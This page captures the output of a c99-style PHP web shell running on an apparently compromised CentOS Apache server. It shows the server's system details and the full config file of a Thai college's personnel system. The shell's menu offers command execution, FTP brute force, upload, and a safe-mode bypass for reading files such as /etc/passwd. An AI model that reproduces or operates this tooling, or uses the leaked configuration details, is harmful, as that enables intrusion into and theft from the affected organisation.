!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/application/config/   drwxr-xr-x
Free 52.31 GB of 127.8 GB (40.93%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     pp_config.php (5.67 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
$config
['college_name'] = "วิทยาลัย";
$config['short_name'] = "ว.";
$config['pp_folder'] = "eperson/";
$config['pp_person_db'] = "people";            //ชื่อฐานข้อมูลบุคลากร
$config['pp_ums_path'] = "/ums"//path สำหรับเรียกไฟล์เพื่อ insert, update, delete ลงฐาน ums
//$config['pp_ums_path'] = "http://118.174.12.11/mispbri/ums";
$config['pp_notFound'] = "** ไม่ปรากฏรายการในฐานข้อมูล **";
$config['pp_excel_exp'] = "images/".$config['pp_folder']."picture/excel.gif";
$config['pp_excel_imp'] = "images/".$config['pp_folder']."picture/excel.jpg";
$config['pp_word_exp'] = "images/".$config['pp_folder']."export_w.gif";
$config['pp_print'] = "images/".$config['pp_folder']."picture/print.gif";
$config['pp_delete'] = "images/".$config['pp_folder']."picture/delete.gif";
$config['pp_edit'] = "images/".$config['pp_folder']."picture/edit.gif";
$config['pp_add'] = "images/".$config['pp_folder']."picture/add.gif";
$config['pp_search'] = "images/".$config['pp_folder']."picture/icon_search.gif";
$config['pp_select'] = "images/".$config['pp_folder']."picture/select.gif";
$config['pp_approve'] = "images/".$config['pp_folder']."picture/approve.gif";
$config['pp_up'] = "images/".$config['pp_folder']."up.gif";
$config['pp_down'] = "images/".$config['pp_folder']."down.gif";
$config['pp_submenu'] = "images/".$config['pp_folder']."submenu.gif";
$config['pp_submenu_g'] = "images/".$config['pp_folder']."submenu_gray.gif";
$config['pp_qt'] = "images/".$config['pp_folder']."helpClose.gif";
$config['pp_qt_g'] = "images/".$config['pp_folder']."helpClose_gray.gif";
$config['pp_show'] = "images/".$config['pp_folder']."show.gif";
$config['pp_copy'] = "images/".$config['pp_folder']."copy.png";
$config['pp_excel_exp_title'] = "ส่งออกเป็น excel";
$config['pp_word_exp_title'] = "ส่งออกเป็น word";
$config['pp_excel_imp_title'] = "นำเข้าข้อมูลด้วย excel";
$config['pp_print_title'] = "พิมพ์";
$config['pp_edit_title'] = "แก้ไข";
$config['pp_delete_title'] = "ลบ";
$config['pp_select_title'] = "เลือก";
$config['pp_approve_title'] = "อนุมัติ";
$config['pp_max_row'] = "100";
$config['pp_ico_popup'] = "images/".$config['pp_folder']."picture/icon_search.gif";
$config['pp_upload_doc'] = './uploads/eperson/doc/';
$config['pp_upload_pic'] = 'uploads/eperson/picturePerson/';
$config['pp_download_doc'] = 'downloads/eperson/exImport.csv';
$config['pp_pic_default'] = 'default.jpg';
$config['pp_topoint_top'] = "images/".$config['pp_folder']."topointtop.jpg";
$config['pp_topoint_under'] = "images/".$config['pp_folder']."topointunder.jpg";
$config['pp_upload_size'] = 2048//2 MB
$config['pp_srmin'] = 60.00;
$config['pp_srmax'] = 100.00;

/*************************************
 * config ค่าที่ fix ไว้ใน code ซึ่งเป็นค่าจากใน UMS
 *************************************/
$config['pp_ums_db'] = "mo_ums";            //ชื่อฐานข้อมูล ums
$config['pp_GpID_admin'] = 500002;        //umgroup : ผู้รับผิดชอบระบบ 
$config['pp_GpID_upsalary'] = 500004;    //umgroup : การเลื่อนเงินเดือน
$config['pp_WgID_outsider'] = 7;                //umwgroup : บุคคลนอกองค์กร

/*************************************
 * config ค่าที่ fix ไว้ใน code ซึ่งเป็นค่าจากใน DB
 *************************************/
 //ข้อมูลประเทศ (ตาราง Country)
$config['pp_thai'] = 7;    //ฟิลด์ countryId : ไทย

 //ข้อมูลประเภทบุคลากร (ตาราง Hier)
$config['pp_hireId_1'] = 1;    //ฟิลด์ hireId : ข้าราชการ 
$config['pp_hireId_2'] = 2;    //ฟิลด์ hireId : ลูกจ้างประจำ 
$config['pp_hireId_3'] = 3;    //ฟิลด์ hireId : ลูกจ้างชั่วคราวรายเดือน 
$config['pp_hireId_4'] = 4;    //ฟิลด์ hireId : ลูกจ้างชั่วคราวรายวัน

//ข้อมูลประเภทหมวดของลูกจ้างประจำ (ตาราง Employee)
$config['pp_eyId_1'] = 1;    //ฟิลด์ employeeId : ไม่มี

//ข้อมูลประเภทของการเปลี่ยนแปลง (ตาราง TypechangPos)
$config['pp_typeId_1'] = 1;    //ฟิลด์ typeId : บรรจุ
$config['pp_typeId_3'] = 3;    //ฟิลด์ typeId :     เลื่อนระดับ
$config['pp_typeId_5'] = 5;    //ฟิลด์ typeId :     ย้ายข้าราชการ
$config['pp_typeId_10'] = 10;    //ฟิลด์ typeId : เลื่อนข้าราชการ

//ข้อมูลหน่วยงาน/สถานที่ (ตาราง Party)
$config['pp_my_partyId'] = 970;    //ฟิลด์ partyId : วสส. ขอนแก่น(หน่วยงานที่ใช้ระบบ)

//ข้อมูลหน่วยงานในสังกัด สบช. (ตาราง us_deptpbri)
$config['pp_dpId_1'] = 999;    //ฟิลด์ dpId : หน่วยงานนอก สบช.
$config['pp_dpId_2'] = 2;    //ฟิลด์ dpId :     ผอ.กลุ่ม ส่วนกลาง
$config['pp_dpId_3'] = 3;    //ฟิลด์ dpId :     ผอ.วิทยาลัย(เชี่ยวชาญ)
$config['pp_dpId_4'] = 4;    //ฟิลด์ dpId :     ผอ.วิทยาลัย(ต้น)
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0058 ]--